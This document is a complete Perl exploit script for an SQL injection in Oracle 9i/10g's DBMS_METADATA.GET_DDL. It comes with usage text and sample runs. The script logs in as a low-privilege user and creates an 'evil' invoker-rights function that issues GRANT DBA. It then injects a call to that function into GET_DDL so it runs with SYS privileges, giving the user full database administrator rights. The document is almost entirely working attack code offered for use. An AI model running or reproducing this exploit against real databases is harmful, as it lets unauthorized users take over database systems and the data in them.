Oracle 9i/10g DBMS_METADATA.GET_DDL SQL Injection Exploit

#!/usr/bin/perl # #&nbsp;Remote&nbsp;Oracle&nbsp;DBMS_METADAT.GET_DDL&nbsp;exploit&nbsp;(9i/10g) # #&nbsp;Grant&nbsp;or&nbsp;revoke&nbsp;dba&nbsp;permission&nbsp;to&nbsp;unprivileged&nbsp;user #&nbsp; #&nbsp;Tested&nbsp;on&nbsp;\"Oracle&nbsp;Database&nbsp;10g&nbsp;Enterprise&nbsp;Edition&nbsp;Release&nbsp;10.1.0.3.0\" #&nbsp; #&nbsp;&nbsp;&nbsp;REF:&nbsp;&nbsp;&nbsp;&nbsp;http://www.securityfocus.com/bid/16287&nbsp; # #&nbsp;&nbsp;&nbsp;AUTHOR:&nbsp;Andrea&nbsp;\"bunker\"&nbsp;Purificato #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://rawlab.mindcreations.com # #&nbsp;&nbsp;&nbsp;DATE:&nbsp;&nbsp;&nbsp;Copyright&nbsp;2007&nbsp;-&nbsp;Fri&nbsp;Feb&nbsp;23&nbsp;12:32:55&nbsp;CET&nbsp;2007 # #&nbsp;Oracle&nbsp;InstantClient&nbsp;(basic&nbsp;+&nbsp;sdk)&nbsp;required&nbsp;for&nbsp;DBD::Oracle # # #&nbsp;bunker@fin:~$&nbsp;perl&nbsp;dbms_meta_get_ddl.pl&nbsp;-h&nbsp;localhost&nbsp;-s&nbsp;test&nbsp;-u&nbsp;bunker&nbsp;-p&nbsp;****&nbsp;-r #&nbsp;&nbsp;[-]&nbsp;Wait... #&nbsp;&nbsp;[-]&nbsp;Revoking&nbsp;DBA&nbsp;from&nbsp;BUNKER... #&nbsp;&nbsp;DBD::Oracle::db&nbsp;do&nbsp;failed:&nbsp;ORA-01031:&nbsp;insufficient&nbsp;privileges&nbsp;(DBD&nbsp;ERROR:&nbsp;OCIStmtExecute)&nbsp;[for&nbsp;Statement&nbsp;\"REVOKE&nbsp;DBA&nbsp;FROM&nbsp;BUNKER\"]&nbsp;at&nbsp;dbms_meta_get_ddl.pl&nbsp;line&nbsp;95. #&nbsp;&nbsp;[-]&nbsp;Done! # #&nbsp;bunker@fin:~$&nbsp;perl&nbsp;dbms_meta_get_ddl.pl&nbsp;-h&nbsp;localhost&nbsp;-s&nbsp;test&nbsp;-u&nbsp;bunker&nbsp;-p&nbsp;****&nbsp;-g #&nbsp;&nbsp;[-]&nbsp;Wait... #&nbsp;&nbsp;[-]&nbsp;Creating&nbsp;evil&nbsp;function... #&nbsp;&nbsp;[-]&nbsp;Go&nbsp;...(don\'t&nbsp;worry&nbsp;about&nbsp;errors)! #&nbsp;&nbsp;DBD::Oracle::st&nbsp;execute&nbsp;failed:&nbsp;ORA-31600:&nbsp;invalid&nbsp;input&nbsp;value&nbsp;\'||BUNKER.own||\'&nbsp;for&nbsp;parameter&nbsp;OBJECT_TYPE&nbsp;in&nbsp;function&nbsp;GET_DDL #&nbsp;&nbsp;ORA-06512:&nbsp;at&nbsp;\"SYS.DBMS_METADATA\",&nbsp;line&nbsp;2576 #&nbsp;&nbsp;ORA-06512:&nbsp;at&nbsp;\"SYS.DBMS_METADATA\",&nbsp;line&nbsp;2627 #&nbsp;&nbsp;ORA-06512:&nbsp;at&nbsp;\"SYS.DBMS_METADATA\",&nbsp;line&nbsp;4220 #&nbsp;&nbsp;ORA-06512:&nbsp;at&nbsp;line&nbsp;5&nbsp;(DBD&nbsp;ERROR:&nbsp;OCIStmtExecute)&nbsp;[for&nbsp;Statement&nbsp;\" #&nbsp;&nbsp;DECLARE #&nbsp;&nbsp;&nbsp;R&nbsp;CLOB; #&nbsp;&nbsp;BEGIN #&nbsp;&nbsp;&nbsp;R&nbsp;:=&nbsp;SYS.DBMS_METADATA.GET_DDL(\'\'\'||BUNKER.own||\'\'\',\'\'); #&nbsp;&nbsp;END; #&nbsp;&nbsp;\"]&nbsp;at&nbsp;dbms_meta_get_ddl.pl&nbsp;line&nbsp;120. #&nbsp;&nbsp;[-]&nbsp;YOU&nbsp;GOT&nbsp;THE&nbsp;POWAH!! # #&nbsp;bunker@fin:~$&nbsp;perl&nbsp;dbms_meta_get_ddl.pl&nbsp;-h&nbsp;localhost&nbsp;-s&nbsp;test&nbsp;-u&nbsp;bunker&nbsp;-p&nbsp;****&nbsp;-r #&nbsp;&nbsp;[-]&nbsp;Wait... #&nbsp;&nbsp;[-]&nbsp;Revoking&nbsp;DBA&nbsp;from&nbsp;BUNKER... #&nbsp;&nbsp;[-]&nbsp;Done! #&nbsp;&nbsp; use&nbsp;warnings; use&nbsp;strict; use&nbsp;DBI; use&nbsp;Getopt::Std; use&nbsp;vars&nbsp;qw/&nbsp;%opt&nbsp;/; sub&nbsp;usage&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;<<\"USAGE\"; &nbsp;&nbsp;&nbsp;&nbsp; Syntax:&nbsp;$0&nbsp;-h&nbsp;<host>&nbsp;-s&nbsp;<sid>&nbsp;-u&nbsp;<user>&nbsp;-p&nbsp;<passwd>&nbsp;-g|-r&nbsp;[-P&nbsp;<port>] Options: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-h&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<host>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;address &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-s&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<sid>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;sid&nbsp;name &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-u&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<user>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<passwd>&nbsp;&nbsp;&nbsp;password&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-g|-r&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(g)rant&nbsp;dba&nbsp;to&nbsp;user&nbsp;|&nbsp;(r)evoke&nbsp;dba&nbsp;from&nbsp;user &nbsp;&nbsp;&nbsp;&nbsp;[-P&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<port>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Oracle&nbsp;port] USAGE &nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;0 } my&nbsp;$opt_string&nbsp;=&nbsp;\'h:s:u:p:grP:\'; getopts($opt_string,&nbsp;\\%opt)&nbsp;or&nbsp;&usage; &usage&nbsp;if&nbsp;(&nbsp;!$opt{h}&nbsp;or&nbsp;!$opt{s}&nbsp;or&nbsp;!$opt{u}&nbsp;or&nbsp;!$opt{p}&nbsp;); &usage&nbsp;if&nbsp;(&nbsp;!$opt{g}&nbsp;and&nbsp;!$opt{r}&nbsp;); my&nbsp;$user&nbsp;=&nbsp;uc&nbsp;$opt{u}; my&nbsp;$dbh&nbsp;=&nbsp;undef; if&nbsp;($opt{P})&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$dbh&nbsp;=&nbsp;DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}\",&nbsp;$opt{u},&nbsp;$opt{p})&nbsp;or&nbsp;die; }&nbsp;else&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$dbh&nbsp;=&nbsp;DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s}\",&nbsp;$opt{u},&nbsp;$opt{p})&nbsp;or&nbsp;die; } my&nbsp;$sqlcmd&nbsp;=&nbsp;\"GRANT&nbsp;DBA&nbsp;TO&nbsp;$user\"; print&nbsp;\"[-]&nbsp;Wait... \"; if&nbsp;($opt{r})&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[-]&nbsp;Revoking&nbsp;DBA&nbsp;from&nbsp;$user... \"; &nbsp;&nbsp;&nbsp;&nbsp;$sqlcmd&nbsp;=&nbsp;\"REVOKE&nbsp;DBA&nbsp;FROM&nbsp;$user\"; &nbsp;&nbsp;&nbsp;&nbsp;$dbh->do(&nbsp;$sqlcmd&nbsp;); &nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[-]&nbsp;Done! \"; &nbsp;&nbsp;&nbsp;&nbsp;$dbh->disconnect; &nbsp;&nbsp;&nbsp;&nbsp;exit; } print&nbsp;\"[-]&nbsp;Creating&nbsp;evil&nbsp;function... \"; $dbh->do(&nbsp;qq{ CREATE&nbsp;OR&nbsp;REPLACE&nbsp;FUNCTION&nbsp;OWN&nbsp;RETURN&nbsp;NUMBER&nbsp; &nbsp;AUTHID&nbsp;CURRENT_USER&nbsp;AS&nbsp; &nbsp;PRAGMA&nbsp;AUTONOMOUS_TRANSACTION;&nbsp; BEGIN &nbsp;EXECUTE&nbsp;IMMEDIATE&nbsp;\'$sqlcmd\';&nbsp;COMMIT;&nbsp; &nbsp;RETURN(0); END; }&nbsp;); &nbsp; print&nbsp;\"[-]&nbsp;Go&nbsp;...(don\'t&nbsp;worry&nbsp;about&nbsp;errors)! \"; my&nbsp;$sth&nbsp;=&nbsp;$dbh->prepare(qq{ DECLARE &nbsp;R&nbsp;CLOB; BEGIN &nbsp;R&nbsp;:=&nbsp;SYS.DBMS_METADATA.GET_DDL(\'\'\'||$user.own||\'\'\',\'\'); END; }); $sth->execute; $sth->finish; print&nbsp;\"[-]&nbsp;YOU&nbsp;GOT&nbsp;THE&nbsp;POWAH!! \"; $dbh->disconnect; exit; &nbsp;